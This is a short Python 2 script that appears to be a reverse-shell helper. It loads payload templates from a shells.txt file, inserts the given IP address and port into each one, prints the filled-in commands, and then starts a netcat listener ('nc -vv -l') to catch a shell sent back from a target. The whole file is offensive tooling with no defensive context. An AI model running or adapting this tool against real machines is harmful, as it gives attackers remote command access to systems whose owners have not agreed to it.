#!/usr/bin/env python

from sys import argv, exit as exit_code
from os import system, path

def GREEN(text):
	return "\033[32m%s\033[0m" % str(text)

def main():
	if len(argv) < 3:
		print 'Syntax Error:\npython %s ip port\nExample:\npython %s 192.168.10.1 4444' % (argv[0], argv[0])
		exit_code(-1)

	ipaddr, port = argv[1], argv[2]
	shells = path.join(path.dirname(path.realpath(__file__)), 'shells.txt')
	for shell in open(shells):
		desc, cmd = shell.split('|', 1)
		cmd = cmd.replace("[IPADDR]", ipaddr)
		cmd = cmd.replace("[PORT]", port)
		print GREEN(desc)
		print cmd

	raw_input('Select your payload, press any key to start the nc listener and send it to the target...')
	system('nc -vv -l %s %s' % (ipaddr, port))

if __name__ == "__main__":
	main()
